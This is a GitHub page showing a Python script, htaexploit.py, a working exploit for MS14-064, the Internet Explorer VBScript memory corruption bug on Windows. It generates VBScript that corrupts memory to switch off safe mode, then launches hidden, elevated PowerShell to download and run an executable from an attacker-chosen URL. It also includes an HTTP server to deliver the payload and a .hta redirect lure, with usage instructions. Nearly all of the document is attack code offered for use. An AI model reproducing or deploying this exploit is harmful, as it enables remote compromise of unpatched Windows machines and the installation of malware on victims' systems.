HTA-Exploit-/htaexploit.py at master · codecrack3/HTA-Exploit- · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
#-------------------------------------------------------------------------------
# Name:       Microsoft Windows HTA (HTML Application) - Remote Code Execution
# Purpose:
#
# Author:      kai (kaisai12 - ceh.vn)
#
# Created:     21/08/2015
# Copyright:   (c) kai 2015
#
#-------------------------------------------------------------------------------
import sys,os
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
import re
import socket,SocketServer
HOME = os.path.dirname(os.path.realpath(__file__))
class myHandler(BaseHTTPRequestHandler):
    evil_html = ''
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(self.evil_html)
        return
    def do_POST(self):
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(self.evil_html)
        return


def server(ip,htmlpayload):
    port = 80
    print '[+] Running Server : %s Port %s\n' % (ip,port)
    myHandler.evil_html = htmlpayload
    httpd = SocketServer.TCPServer((ip, port), myHandler)
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        print "CTRL+C Interupt Detected!"
        print "Shutdown Server"
        httpd.shutdown
        exit()


def exploit_payload(linkpayload):
  html = '<html>\n'
  html += '<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >\n'
  html += '<title>Crazy :v Fun </title>\n'
  html += '<body bgcolor = Black link="#00FF00" alink="#ADFF2F" vlink="#98FB98"><br/>\n\n\n'
  html += '<SCRIPT LANGUAGE="VBScript">\n\n'
  html += 'function trigger()\n'
  html += 'On Error Resume Next\n'
  html += 'set shell=createobject("Shell.Application")\n'
  html += 'command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('"'%s','"'load.exe'"');$(New-Object -com Shell.Application).ShellExecute('load.exe');"'"' % linkpayload
  html += '\nshell.ShellExecute "powershell.exe", "-Command " & command, "", "runas", 0 \n'
  html += 'end function\n'
  html += '</script>\n'
  html += """
<SCRIPT LANGUAGE="VBScript">
  dim aa()
  dim ab()
  dim a0
  dim a1
  dim a2
  dim a3
  dim win9x
  dim intVersion
  dim rnda
  dim funclass
  dim myarray

  Begin()

  function Begin()
    On Error Resume Next
    info=Navigator.UserAgent
    if(instr(info,"Win64")>0) then
     exit function
    end if
    if (instr(info,"MSIE")>0) then
      intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
    else
     exit function
    end if
    win9x=0
    BeginInit()
    If Create()=True Then
      myarray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
      myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
      if(intVersion<4) then
        document.write("<br> IE")
        document.write(intVersion)
        runshellcode()
      else
        setnotsafemode()
      end if
    end if
  end function

  function BeginInit()
    Randomize()
    redim aa(5)
    redim ab(5)
    a0=13+17*rnd(6)
    a3=7+3*rnd(5)
  end function

  function Create()
    On Error Resume Next
    dim i
    Create=False
    For i = 0 To 400
      If Over()=True Then
      '   document.write(i)
         Create=True
         Exit For
      End If
    Next
  end function

  sub testaa()
  end sub

  function mydata()
    On Error Resume Next
    i=testaa
    i=null
    redim Preserve aa(a2)
    ab(0)=0
    aa(a1)=i
    ab(0)=6.36598737437801E-314
    aa(a1+2)=myarray
    ab(2)=1.74088534731324E-310
    mydata=aa(a1)
    redim Preserve aa(a0)
  end function

  function setnotsafemode()
    On Error Resume Next
    i=mydata()
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134)
    for k=0 to &h60 step 4
      j=readmemo(i+&h120+k)
      if(j=14) then
        j=0
        redim  Preserve aa(a2)
        aa(a1+2)(i+&h11c+k)=ab(4)
        redim  Preserve aa(a0)
        j=0
        j=readmemo(i+&h120+k)
        Exit for
      end if
      next
      ab(2)=1.69759663316747E-313
      trigger()
  end function

  function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000
    redim Preserve aa(a0)
    redim ab(a0)
    redim Preserve aa(a2)
    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10
    If(IsObject(aa(a1-1)) = False) Then
      if(intVersion<4) then
        mem=cint(a0+1)*16
        j=vartype(aa(a1-1))
        if((j=mem+4) or (j*8=mem+8)) then
          if(vartype(aa(a1-1))<>0)  Then
            If(IsObject(aa(a1)) = False ) Then
              type1=VarType(aa(a1))
            end if
          end if
        else
          redim  Preserve aa(a0)
          exit  function
        end if
      else
        if(vartype(aa(a1-1))<>0)  Then
          If(IsObject(aa(a1)) = False ) Then
            type1=VarType(aa(a1))
          end if
        end if
      end if
    end if
    If(type1=&h2f66) Then
      Over=True
    End If
    If(type1=&hB9AD) Then
      Over=True
      win9x=1
    End If
    redim Preserve aa(a0)
  end function

  function ReadMemo(add)
    On Error Resume Next
    redim Preserve aa(a2)
    ab(0)=0
    aa(a1)=add+4
    ab(0)=1.69759663316747E-313
    ReadMemo=lenb(aa(a1))
    ab(0)=0
    redim Preserve aa(a0)
  end function
</script>
<center><h1><object width="420" height="315"
data="http://www.youtube.com/embed/YAKX0ZzUtA8?autoplay=1">
</object></h1></center>
<hr></body></html>"""
  return html

def createfileexploit(ip,fileexploit):
    print '[+] Genarate Exploit Build Name: %s\\\n' % HOME + fileexploit
    try:
        f = open(fileexploit,'wb')
        f.write('<html><head><title>Crazy!</title><META http-equiv="refresh" content="0;URL=http://'+ip+'"></head></html>')
        f.close()
        print '[+] Create file payload ok \n'
    except:
        print "[-] Error write playload \n"

def banner():
    print '-'*50
    print ' Title : Microsoft Windows HTA (HTML Application) - Remote Code Execution'
    print ' Tested on Windows 7 / Server 2008 (support powershell :v) \n\n'
    print ' Author      :   Kai (CEH.VN) \n\n'
    print ' Website     :   http://www.ceh.vn'
    print ' Twitter     :   https://twitter.com/kaisai121'
    print ' FaceBook    :   https://www.facebook.com/kai.sai.35\n\n'
    print ' Bug Vendor  :   MS14-064'
    print '-'*50
def usage():
    print "\n[+] Usage: htaexploit.py <Link download file execute> <Ip server payload> <Name file payload create (.hta)> \n"
    print "\n \t(htaexploit.py http://kaisai.com/exploit.exe 127.0.0.1 zeref.hta)\n"

if __name__ == '__main__':
   banner()
   if len(sys.argv) < 3:
       usage()
   else:
        try:
            createfileexploit(sys.argv[2],sys.argv[3])
            server(sys.argv[2],exploit_payload(sys.argv[1]))
        except:
            print 'Error'